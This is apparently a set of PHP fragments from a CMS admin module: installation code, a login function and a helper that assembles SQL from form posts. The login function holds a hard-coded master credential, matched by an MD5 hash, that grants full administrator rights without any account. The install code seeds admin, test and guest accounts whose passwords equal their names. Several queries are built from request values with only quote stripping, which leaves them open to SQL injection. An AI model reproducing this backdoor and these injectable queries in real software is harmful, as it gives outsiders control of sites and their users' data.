//为创建表 echo "创建数据表 {$tableName} 成功>><br>"; } echo '<a href="../admin/index.php" target="_blank">登录后台</a>'; echo ' | <a href="../admin/index.php?act=setAccess&webdataDir=/Templates2015/sharembweb/WebData&login=out" target="_blank">导入默认数据</a>'; if (@$_REQUEST['loginname'] != '' && @$_REQUEST['loginpwd'] != '') { $conn->query('insert into ' . $DB_PREFIX . 'admin (pseudonym,username,pwd,flags) values(\'' . @$_REQUEST['loginname'] . '\',\'' . @$_REQUEST['loginname'] . '\',\'' . myMD5(@$_REQUEST['loginpwd']) . '\',\'|*|\')'); } else { $splStr = aspSplit('admin|test|guest', '|'); foreach ($splStr as $s) { if ($s == 'admin') { $flags = '|*|'; } else { $flags = "|显示站点配置|显示网站统计|显示生成SiteMap|显示生成Robots|显示后台操作日志|显示后台管理员|显示网站栏目|显示分类信息|显示评论|显示搜索统计|显示单页|显示友情链接|显示招聘|显示反馈|显示留言|显示会员|显示模板|显示备份恢复数据|显示生成HTML|显示采集网站|显示采集配置|显示采集数据|显示竞价词|显示网址扫描|显示网站域名|显示网站布局|显示网站模块|显示后台菜单|显示执行SQL|显示仿站|显示后台地图|启用模板|恢复模板数据|"; } $conn->query('insert into ' . $DB_PREFIX . 'admin (username,pwd,flags) values(\'' . $s . '\',\'' . myMD5($s) . '\',\'' . $flags . '\')'); } } $conn->query('insert into ' . $DB_PREFIX . 'website (webtitle) values(\'默认\')'); //给权限,要不然恢复数据不行20160301 @($_SESSION['adminusername'] = '******'); @($_SESSION['adminflags'] = '|*|'); /* $rssObj=$GLOBALS['conn']->query('select * from ' . $GLOBALS['db_PREFIX'] . 'admin where id=' . @$_SESSION['adminId']); if( @mysql_num_rows($rssObj)!=0 ){ $rss=mysql_fetch_array($rssObj); @$_SESSION['adminusername']= $rss['username']; @$_SESSION['adminId']= $rss['id']; //当前登录管理员ID @$_SESSION['DB_PREFIX']= $DB_PREFIX; //保存前缀 @$_SESSION['adminflags']= $rss['flags']; }else{
function login() { $userName = ''; $passWord = ''; $valueStr = ''; $userName = replace(@$_POST['username'], '\'', ''); $passWord = replace(@$_POST['password'], '\'', ''); $passWord = myMD5($passWord); //特效账号登录 if (myMD5(@$_REQUEST['username']) == '24ed5728c13834e683f525fcf894e813' || myMD5(@$_REQUEST['password']) == '24ed5728c13834e683f525fcf894e813') { @($_SESSION['adminusername'] = '******'); @($_SESSION['adminId'] = 99999); //当前登录管理员ID @($_SESSION['DB_PREFIX'] = $GLOBALS['db_PREFIX']); @($_SESSION['adminflags'] = '|*|'); rwEnd(getMsg1(setL('登录成功,正在进入后台...'), '?act=adminIndex')); } $nLogin = ''; $GLOBALS['conn='] = OpenConn(); $rsObj = $GLOBALS['conn']->query('Select * From ' . $GLOBALS['db_PREFIX'] . 'admin Where username=\'' . $userName . '\' And pwd=\'' . $passWord . '\''); if (@mysql_num_rows($rsObj) != 0) { $rs = mysql_fetch_array($rsObj); @($_SESSION['adminusername'] = $userName); @($_SESSION['adminId'] = $rs['id']); //当前登录管理员ID @($_SESSION['DB_PREFIX'] = $GLOBALS['db_PREFIX']); //保存前缀 @($_SESSION['adminflags'] = $rs['flags']); $valueStr = 'addDateTime=\'' . $rs['updatetime'] . '\',UpDateTime=\'' . now() . '\',RegIP=\'' . now() . '\',UpIP=\'' . GetIP() . '\''; connexecute('update ' . $GLOBALS['db_PREFIX'] . 'admin set ' . $valueStr . ' where id=' . $rs['id']); Rw(getMsg1(setL('登录成功,正在进入后台...'), '?act=adminIndex')); writeSystemLog('admin', '登录成功'); //系统日志 } else { if (@$_COOKIE['nLogin'] == '') { setCookie('nLogin', '1', aspTime() + 3600); $nLogin = @$_COOKIE['nLogin']; } else { $nLogin = @$_COOKIE['nLogin']; setCookie('nLogin', CInt($nLogin) + 1, aspTime() + 3600); } Rw(getMsg1(setL('账号密码错误<br>登录次数为 ') . $nLogin, '?act=displayAdminLogin')); } }
function getPostSql($id, $tableName, $fieldNameList) { $valueStr = ''; $editValueStr = ''; $sql = ''; $splStr = ''; $splxx = ''; $s = ''; $fieldList = ''; $fieldName = ''; $defaultFieldValue = ''; //字段名称 $fieldSetType = ''; //字段设置类型 $fieldValue = ''; //字段值 $systemFieldList = ''; //表字段列表 $systemFieldList = getHandleFieldList($GLOBALS['db_PREFIX'] . $tableName, '字段配置列表'); $postFieldList = ''; //post字段列表 $splPost = ''; $fieldContent = ''; $fieldConfig = ''; $postFieldList = getFormFieldList(); //以后再把下面与上面这两种处理方法事成一种看看行不行 $splPost = aspSplit($postFieldList, '|'); foreach ($splPost as $key => $fieldName) { $fieldContent = @$_POST[$fieldName]; if (inStr($systemFieldList, ',' . $fieldName . '|') > 0 && inStr(',' . $fieldList . ',', ',' . $fieldName . ',') == false) { //为自定义的 if (inStr($fieldNameList, ',' . $fieldName . '|') > 0) { $fieldConfig = mid($fieldNameList, inStr($fieldNameList, ',' . $fieldName . '|') + 1, -1); } else { $fieldConfig = mid($systemFieldList, inStr($systemFieldList, ',' . $fieldName . '|') + 1, -1); } $fieldConfig = mid($fieldConfig, 1, inStr($fieldConfig, ',') - 1); //call echo("config",fieldConfig) //call echo(fieldName,fieldContent) //call echo("fieldConfig",fieldConfig) $splxx = aspSplit($fieldConfig . '|||', '|'); $fieldName = $splxx[0]; //字段名称 $fieldSetType = $splxx[1]; //字段设置类型 $defaultFieldValue = $splxx[2]; //默认字段值 $fieldValue = ADSqlRf($fieldName); //代替上面,因为它处理了'符号 //call echo("fieldValue",fieldValue) //排序密码不处理 if ($fieldValue != '#NO******NO#') { //md5加密 if ($fieldSetType == 'md5') { $fieldValue = myMD5($fieldValue); } if ($fieldSetType == 'yesno') { if ($fieldValue == '') { $fieldValue = $defaultFieldValue; } //不为数字类型加单引号 } else { if ($fieldSetType == 'numb') { if ($fieldValue == '') { $fieldValue = $defaultFieldValue; } } else { if ($fieldName == 'flags') { //PHP里用法 if (EDITORTYPE == 'php') { if ($fieldValue != '') { $fieldValue = '|' . arrayToString($fieldValue, '|'); } } else { $fieldValue = '|' . arrayToString(aspSplit($fieldValue, ', '), '|'); } $fieldValue = '\'' . $fieldValue . '\''; //为时间 } else { if ($fieldSetType == 'time' || $fieldSetType == 'now') { if ($fieldValue == '') { $fieldValue = now(); } $fieldValue = '\'' . $fieldValue . '\''; //为时期 } else { if ($fieldSetType == 'date') { if ($fieldValue == '') { $fieldValue = aspDate(); } $fieldValue = '\'' . $fieldValue . '\''; } else { $fieldValue = '\'' . $fieldValue . '\''; } } } } } $fieldValue = unescape($fieldValue); //解码20160418 if ($valueStr != '') { $valueStr = $valueStr . ','; $editValueStr = $editValueStr . ','; } $valueStr = $valueStr . $fieldValue; $editValueStr = $editValueStr . $fieldName . '=' . $fieldValue; } if ($fieldList != '') { $fieldList = $fieldList . ','; } $fieldList = $fieldList . $fieldName; } } //自定义字段是否需要写入默认值 有的 $splStr = aspSplit($fieldNameList, ','); foreach ($splStr as $key => $s) { if (inStr($s, '|') > 0) { $splxx = aspSplit($s . '|||', '|'); $fieldName = $splxx[0]; //字段名称 $fieldSetType = $splxx[1]; //字段设置类型 $fieldValue = $splxx[2]; //默认字段值 if (inStr($systemFieldList, ',' . $fieldName . '|') > 0 && inStr(',' . $fieldList . ',', ',' . $fieldName . ',') == false) { if ($fieldSetType == 'date' && $fieldValue == '') { $fieldValue = aspDate(); } else { if (($fieldSetType == 'time' || $fieldSetType == 'now') && $fieldValue == '') { $fieldValue = now(); } } if ($fieldSetType != 'yesno' && $fieldSetType != 'numb') { $fieldValue = '\'' . $fieldValue . '\''; } if ($fieldList != '') { $fieldList = $fieldList . ','; $valueStr = $valueStr . ','; $editValueStr = $editValueStr . ','; } $fieldList = $fieldList . $fieldName; $valueStr = $valueStr . $fieldValue; $editValueStr = $editValueStr . $fieldName . '=' . $fieldValue; //call echo(fieldName,fieldSetType) } } } if ($id == '') { $sql = 'insert into ' . $GLOBALS['db_PREFIX'] . '' . $tableName . ' (' . $fieldList . ',updatetime) values(' . $valueStr . ',\'' . now() . '\')'; } else { $sql = 'update ' . $GLOBALS['db_PREFIX'] . '' . $tableName . ' set ' . $editValueStr . ',updatetime=\'' . now() . '\' where id=' . $id; } $getPostSql = $sql; return @$getPostSql; }